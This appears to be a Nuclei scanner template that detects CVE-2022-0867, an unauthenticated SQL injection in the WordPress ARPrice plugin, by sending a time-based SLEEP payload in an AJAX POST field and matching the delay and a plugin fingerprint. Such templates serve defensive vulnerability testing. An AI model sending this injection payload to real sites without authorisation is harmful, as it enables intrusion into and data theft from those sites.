50 lines
1.8 KiB
YAML
50 lines
1.8 KiB
YAML
id: CVE-2022-0867
|
|
|
|
info:
|
|
name: WordPress ARPrice <3.6.1 - SQL Injection
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494
|
|
- https://wordpress.org/plugins/arprice-responsive-pricing-table/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0867
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-0867
|
|
cwe-id: CWE-89
|
|
epss-score: 0.03029
|
|
cpe: cpe:2.3:a:reputeinfosystems:pricing_table:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 2
|
|
verified: true
|
|
framework: wordpress
|
|
vendor: reputeinfosystems
|
|
product: pricing_table
|
|
tags: unauth,wp,cve2022,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,cve
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 10s
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
action=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)
|
|
- |
|
|
GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
req-condition: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration_1>=6'
|
|
- 'status_code_1 == 200'
|
|
- 'contains(content_type_1, "text/html")'
|
|
- 'contains(body_2, "ArpPriceTable")'
|
|
condition: and
|